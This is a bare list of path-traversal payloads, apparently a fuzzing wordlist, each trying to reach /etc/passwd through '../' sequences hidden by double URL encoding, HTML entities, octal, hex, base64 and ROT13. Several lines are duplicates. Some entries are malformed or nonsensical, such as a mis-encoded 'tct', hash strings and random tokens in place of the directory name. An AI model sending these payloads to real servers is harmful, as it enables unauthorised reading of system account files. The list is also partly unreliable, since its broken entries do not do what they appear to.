%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd
..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd
../../../../../../../%65%74%63/passwd
%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd
..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd
%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd
..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd
../../../../../../../%65%74%63/passwd
%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd
..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd
../../../../../../../%65%74%63/passwd
%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd
..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd
../../../../../../../%65%74%63/passwd
../../../../../../../%c3%89%c3%87%c3%97/passwd
../../../../../../../%303%221%210/passwd
../../../../../../../%u0074%u0063%u0074/passwd
../../../../../../../ZXRjL3Bhc3N3ZA==
../../../../../../../&#101;&#116;&#99;/passwd
../../../../../../../6574632f706173737764
../../../../../../../&#101;&#116;&#99;/passwd
../../../../../../../\145\164\143/passwd
../../../../../../../01100101-01110100-01100011/passwd
../../../../../../../MZ2W2YTIQQ%3D%3D/passwd
../../../../../../../2jTqNc4sj/passwd
../../../../../../../098f6bcd4621d373cade4e832627b4f6/passwd
../../../../../../../5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8/passwd
../../../../../../../rgp/cnffjqa
